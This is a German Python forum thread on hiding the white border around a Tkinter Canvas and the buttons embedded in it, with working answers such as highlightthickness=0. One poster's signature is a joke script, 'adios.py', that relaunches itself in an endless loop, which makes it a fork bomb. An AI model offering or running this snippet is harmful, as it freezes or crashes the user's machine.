Rand bei Canvas

Fragen zu Tkinter.
Antworten
schlangenbeschwörer
User
Beiträge: 419
Registriert: Sonntag 3. September 2006, 15:11
Wohnort: in den weiten von NRW
Kontaktdaten:

Hallo,
ich möchte gerne ein Canvas mit schwarzem Hintergrund in ein Fenster mit ebenfalls schwarzem Hintergrund einbetten, sodass man das Canvas selbst nicht sieht. Leider ist dies doch der Fall, da um das Canvas immer ein weißer Rahmen erscheint.
:arrow: Wie kann ich den "wegmachen" ?
Gruß, jj
Zuletzt geändert von schlangenbeschwörer am Mittwoch 18. Oktober 2006, 14:16, insgesamt 2-mal geändert.
Benutzeravatar
Mr_Snede
User
Beiträge: 387
Registriert: Sonntag 8. Februar 2004, 16:02
Wohnort: D-Dorf, Bo

Zeige mal den Quellcode, den du bis jetzt hast.
Benutzeravatar
wuf
User
Beiträge: 1529
Registriert: Sonntag 8. Juni 2003, 09:50

Hallo schlangenbeschwörer

Code: Alles auswählen

canvas.configure(highlightthickness = 0)
Sollte das Problem lösen.

Gruss wuf :wink:
Take it easy Mates!
jAN
User
Beiträge: 170
Registriert: Samstag 4. Juni 2005, 18:51
Wohnort: Großmehlra (in Thüringen)
Kontaktdaten:

oder mach den rahmen mit einer dicke von -2... das hat bei mir schon mal geholfen...
#adios.py
import os,sys
while 1: os.startfile(sys.argv[0])
schlangenbeschwörer
User
Beiträge: 419
Registriert: Sonntag 3. September 2006, 15:11
Wohnort: in den weiten von NRW
Kontaktdaten:

Danke wuf und auch jAN,
ich habs grad mal ausprobiert und es geht beides.
Gruß, jj :lol:
Louis19
User
Beiträge: 18
Registriert: Mittwoch 17. Juni 2009, 12:07

Hallo,

wenn ich jetzt Widgets in das Canvas setzten möchte, dann haben die auch diesen weißen Rahmen. Jedoch lassen sich diese nicht mit

Code: Alles auswählen

widget_name.configure(highlightthickness = 0)
wegnehmen. Gibt es da was ähnliches ?

Gruß
Louis
Benutzeravatar
wuf
User
Beiträge: 1529
Registriert: Sonntag 8. Juni 2003, 09:50

Hallo Louis19

Was für Widgets platzierst du in der Canvas? Könntest du ein Beispiel zeigen?

Gruss wuf :wink:
Take it easy Mates!
Louis19
User
Beiträge: 18
Registriert: Mittwoch 17. Juni 2009, 12:07

das ist generell so außer bei Labels.
zum Beispiel bei Buttons hab ich:

Code: Alles auswählen

self.phig_0 = PhotoImage(file='0.gif')      
self.sbt_0 =Button(image=self.phig_0)
self.linksunten.create_window('.5','1c', window=self.sbt_0)
Louis19
User
Beiträge: 18
Registriert: Mittwoch 17. Juni 2009, 12:07

also ich hab das ganze jetzt nochmal unter Windows getestet und da ist der Rand glaub ich verschwunden (, oder so klein das er mich nicht stört :wink: ).

Trotzdem Danke

Gruß
Louis

PS: Aber auf meinem Mac bleibt da der Rand.
Benutzeravatar
wuf
User
Beiträge: 1529
Registriert: Sonntag 8. Juni 2003, 09:50

...... Interessanterweise bleibt auf einem Button mit Bild zwischen Bild und Buttonrand eine Lücke von einem Pixel bestehen die mit der Button-Optionen bd=0 und highlightthickness=0 nicht wegzubringen ist. Bei Verwendung eines Label-Widgets an Stelle eines Button-Widgets geht es hingegen ohne Rand. Da fällt aber die 3D-Animation bei Betätigung des Labels weg.
Siehe hierfür noch Thread:
http://www.python-forum.de/post-158702.html#158702
bei dem es auch um dieses Problem geht.

Gruss wuf :wink:
Take it easy Mates!
Antworten